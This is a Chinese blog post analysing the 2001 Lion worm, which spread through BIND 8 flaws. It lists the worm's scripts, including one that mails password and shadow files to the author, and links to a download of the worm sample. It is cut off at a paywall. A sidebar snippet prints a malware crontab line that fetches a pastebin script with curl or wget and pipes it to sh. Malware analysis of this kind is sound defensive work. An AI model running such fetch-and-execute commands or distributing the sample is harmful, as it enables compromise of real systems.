Linux_Lion病毒分析

最新推荐文章于 2023-05-18 20:11:51 发布
最新推荐文章于 2023-05-18 20:11:51 发布
阅读量7k 收藏 3
点赞数
分类专栏: 编程脚本 文章标签: linux redhat 脚本 tcp stream shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/www_307/article/details/96170
版权

病毒样本

http://www.xfocus.net/tools/200108/lion.tgz

看了他的分发结构和传染特性,没什么新异,与Raman传播机制相同,不过用这个做模版病毒不错,

Lion蠕虫从2001年4月6日,由http://www.sans.org报道以来引起了广泛的关注。它最初来源于(中国红客联盟,作者是一位中国“红客”-lion。这个蠕虫是这个组织针对日本修改教科书一事进行报复的一部分,从Lion蠕虫感染系统后行为来看,其主要目的是搜集系统信息,可能是下一步攻击的前奏。下面是HUC关于Lion蠕虫的宣言:
because of the Japan's disrepect,cnhonker had been roused ,and the lion worm is just
to tell the Japanese chinese is not sheep,they must be answer for.They must assue
the obligation with their crime.They must assue their artion for the educational book
这篇文章的作者在文章中对此表达了自己的不满,认为不应该以此目的散布Lion蠕虫。在翻译时,我将这一部分省略了。不过,如果单纯从技术的角度来看,这个蠕虫几乎没有任何新意,简直是抄袭,它的传播之所以能够引起如此大的震动,主要要归功于BIND8的两个安全漏洞。是这两个珠联壁合的安全缺陷使Lion蠕虫能够大范围攻击DNS系统,快速传播。


综述
Lion蠕虫有三个非常清晰的版本,是一个由脚本驱动的蠕虫。第一版有一个感染例程和一个t0rn rootkit;第二版是第一版的一个改进版本,只是没有rootkit;第三版几乎就是ramen蠕虫的一个翻版,只是exploit部分改为利用BIND8安全缺陷。
这三个版本有同样的核心部分。这个蠕虫有一个利用TCP连接进行扫描的端口扫描程序,BIND8 exploit程序,还有一些脚本用来粘连蠕虫的各个部分,并驱动蠕虫。前两个版本的蠕虫是从一台服务器上下栽自己(中国境内的一台FreeBSD服务器)。而第三版使用了分布式的传播代码,从前一台被感染的系统下载自身,这些代码来自ramen蠕虫,所有已经发现的Lion蠕虫中都有下面这些文件:
1).li0n.sh 作者:蠕虫的作者 shell脚本,删除tcpwrapers访问控制列表,运行getip.sh,把蠕虫加入启动脚本,接着运行star.sh
2).getip.sh 作者:蠕虫的作者 shell脚本,把系统的IP地址、操作系统版本信息、/etc/passwd文件和/etc/shadow文件发送到攻击者的email地址(li0nkit@china.com)
3).star.sh 作者:蠕虫的作者 shell脚本,启动scan.sh和hack.sh为后台进程。
4).scan.sh 作者:蠕虫的作者 shell脚本,停止所有本地正在运行的BIND进程,运行randb选择一个B类网址,接着对目标运行pscan,把结果保存在bindname.log。
5).randb 作者:不详 Linux ELF二进制文件,打印一个随机的B类IP地址,和ADMw0rm的gimmeRAND.c文件极为类似。
6).pscan 作者:不详 Linux ELF二进制文件,是一个端口扫描程序,在一个给定的A、B、C范围中扫描一个单一的TCP端口。首次发现,但是在源代码中没有作者的声明。
7).hack.sh 作者:蠕虫的作者 shell脚本,从bindname.log读取并且使用bindx.sh攻击目标。
8).bindx.sh 作者:蠕虫的作者 shell脚本,启动bind攻击远程目标
9).bind 作者:LSD Linux ELF二进制文件,攻击有安全缺陷的bind-8.2.x BIND服务器。

这是一个典型的蠕虫,从以前的蠕虫中抄袭了很多代码,例如:ADMworm(1998)、Millenium Worm(1999)和Ramen Worm(2001)。除非认为hack.sh是为了驱动多个攻击脚本,否则这个文件是多余的。这个蠕虫的作者在其中只放了一个攻击程序,但是为使用多种攻击留下扩展空间。其它的脚本也是从其它的蠕虫改进的。

三个版本的lion蠕虫都是用同样的传染、繁殖方式。lion蠕虫的网络活动是从53/TCP端口开始的,它随机扫描B类IP地址段。当发现一个BIND域名服务器,就启动攻击程序攻击目标。攻击成功后,运行下载命令把自己下载到被侵入的主机,展开包,运行启动脚本。

lion蠕虫所做的第一步是使用pscan探测一个随机的B类IP地址空间。我修理了一下randb程序使其总是返回10.0.0。我之所以选择C类IP地址空间10.0.0.0/24,只不过是要减小日志文件的大小。pscan程序使用完全连接扫描,它向这个地址空间的每个地址发出了一个同步包(SYN),这样加快了扫描的速度,但是在

最低0.47元/天 解锁文章
www_307
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux后门XnoteDDoS2病毒分析与处理方案
si1ence的博客
07-18 1288
0x0 事件背景 某Linux服务器经常出现apache的conf文件被篡改后出现挂黑链的情况,并且偶尔出现大规模的DDOS外发现象恶意进程删除后会自动重启,无法彻底删除。   0x1 初步分析 通过线程检查发现,系统存在二个对外发起连接的进程 外联地址均为HK的IP地址,黑客朋友都懂得,毕竟方便且价格便宜。 根据对二个对外发起连接的恶意进程进行追溯,发现其中一个进程的父进程P...
Linux平台流行病毒解析 企业用户为主要攻击目标
weixin_46404689的博客
07-06 499
Linux操作系统因拥有高稳定性、通用性、开源等特性,通常在web服务器、IoT、嵌入式开发、超级计算机等领域作为首选操作系统。近年来,不仅互联网行业,政府、金融、教育、医疗、制造业、能源等行业也越来越多采用Linux架构的办公系统和服务器系统。无论是为了维护技术工程人员的开发安全,还是保护企业的信息和财产安全,Linux系统终端的安全防护日益成为一个重要的课题。...
Linux病毒研究与分析
Go With Heart的专栏
08-05 4375
前言: 在我们日常生活中早就对windows中的病毒习惯了,对付windows中的病毒。我们有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 随着网络的发展,很多企业痘使用了Linux操作系统,原因主要是Linux的安全性比较高,但是Linux也会感染病毒。本文会对Linux病毒原理和如何防范做初步的介绍。 一、 Linux病毒史 1996年:破解组织V
linux分析病毒,关于Linux操作系统病毒的原型分析
weixin_39553352的博客
05-14 167
一、 介绍写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解病毒的基本工作原理。二、 ELF Infector (ELF文件感染器)为了制作病毒文件,我们需要一个ELF文件感染器,用于制造第一个带毒文件。对于ELF文件感染技术,在Silvio Cesa...
linux 病毒脚本,解析常见的Linux病毒
weixin_39972019的博客
05-02 190
Linux的用户也许听说甚至遇到过一些Linux病毒,这些Linux病毒的原理和发作症状各不相同,所以采取的防范方法也各不相同。为了更好地防范Linux病毒,我们先对已知的一些Linux病毒进行分类。从目前出现的Linux病毒来看,可以归纳到以下几个病毒类型中去:1、感染ELF格式文件的病毒这类病毒以ELF格式的文件为主要感染目标,通过汇编或者C可以写出能感染ELF文件的病毒。Lindose病毒就...
linux】挖矿病毒nanominer伪装成python占用服务器GPU!本文带你分析并杀毒!
weixin_43693967的博客
05-18 2876
linux中了伪装成python的挖矿病毒,可以看到root用户将GPU的核心跑满了每个占用都是100%,显存吃了6G多。本文详细记录了病毒的原理和查杀记录
linux_lion病毒分析,GitHub - backlion/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合...
weixin_39604276的博客
05-13 104
CVE-2017-1000367  [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112  [a memory corruption due to UFO to non-UFO path switch]CVE-2017-16939  [UAF in Netlink socket subsystem – XFRM](Linux kernel before 4.1...
1i0n蠕虫分析
生命的守望
12-28 1705
作者:zackno 情况简介 开始,无意当中列了一下系统进程发现一个有趣的进程。 [acc@firework acc]$ps aux ..... ...... root 3440 99.9 0.5 1088 360 ? R 16:00 0:06 ./pscan xxx.xx 53 ...... [root@firework /root]# ps aux | grep pscan root 3833
病毒样本
GodsLeft的专栏
05-26 4534
crontab可疑行 # crontab脚本,删掉后会自动重写 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 查看其中的qbbSdzZd文件 > wget https://pastebin.com/raw/qbbS...
Linux环境下可传播的病毒,Linux环境下病毒类型总结
weixin_36261487的博客
05-05 740
虽然目前来说,Linux环境下的病毒少之又少,但是还是有的,掌握一定的知识对我们来说只有好处!1.感染ELF格式文件的病毒这类病毒以ELF格式的文件为主要感染目标,通过汇编或者C语言可以写出能感染ELF文件的病毒。Lindose病毒就是一种能感染ELF文件的病毒,当它发现一个ELF文件时,将检查被感染的机器类型。如果查找到匹配的类型,则查找该文件中是否有一部分大于2784字节(或十六进制AEO),...
独狼网络博客换地址了 www.cnhonker.me
weixin_34208185的博客
01-20 373
博客换 地址 红客独狼 www.cnhonker.me 转载于:https://blog.51cto.com/cnhonkeme/1122983
国内外安全网站网址大集合
weixin_34278190的博客
04-15 3460
国内安全 http://security.zz.ha.cn/ 起点安全,有相当不错的原创内容 国内安全 http://www.shopsky.com/ flashsky的个人主页 国内安全 http://www.safechina.net 有较多原创内容的安全站 国内安...
Linux中挖矿病毒清理通用思路
dayouzi的博客
04-19 3672
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
经典中国黑客站点推荐
dianmian4635的博客
09-28 6467
天天安全网 http://wwww.ttian.net 灰色轨迹 http://sandflee.net 中国信息安全论坛 http://www.chinafirst.org.cn505net急救网 http://www.505net.net中国黑客联盟 http://cnhacker.com中国鹰派 http://11s268.com黑白网络 http://www.heibai.net...
Linux系统常见的病毒介绍(附解决方案)
makaisghr的专栏
06-16 8076
Linux系统常见的病毒介绍Linux系统常见的病毒介绍BillGatesDDGSystemdMinerStartMinerWatchdogsMinerXorDDosRainbowMiner Linux系统常见的病毒介绍 BillGates BillGates在2014年被首次发现,由于其样本中多变量及函数包含字符串”gates”而得名,该病毒主要被黑客用于DDos,其特点是会替换系统正常程序(ss、netstat、ps、lsof)进行伪装 主机中毒现象: [1] 在/tmp/目录下存在gates.lod、
linux勒索病毒分析,永恒之蓝的勒索病毒tasksche.exe样本分析
weixin_32103009的博客
05-13 2241
内容:分析病毒结构,写出病毒如何利用漏洞进行攻击,详细剖析勒索病毒的运行过程,使用了什么加密算法,调用了什么系统API。进阶:中了该勒索病毒,怎么恢复数据样本分析首先是看下病毒样本的哈希值图片.png查壳信息,win32程序无壳:图片.png载入IDA后,先查看字符串,看到有RSA和AES,猜测之后会使用这两种加密方式:图片.png用IDA的findcrypto插件,找到了AES算法的特征:图片....
linux病毒分析
tz_gx的专栏
03-15 1156
场景:系统每天早上自动执行一个apache的进程,且占用大量CPU资源如下图 检查分析进程所在路径: 然而tmp目录已经被删除了,kill -9 28271 28251 删除进程了,第二天又会自动启动这个进程,感觉应该是中毒了 解决办法:检查服务器自动执行脚本目录: 发现cron.daily目录最近被修改过,找到里面新增的文件anacron删除即可 部分anacr
lion_pytorch安装
最新发布
10-24
要安装lion_pytorch,可以使用pip命令进行安装。具体步骤如下: 1. 打开终端或命令行界面。 2. 输入命令:pip install lion-pytorch 3. 等待安装完成即可。 需要注意的是,安装lion_pytorch之前需要先安装好PyTorch。另外,如果你使用的是conda环境,可以使用conda命令进行安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值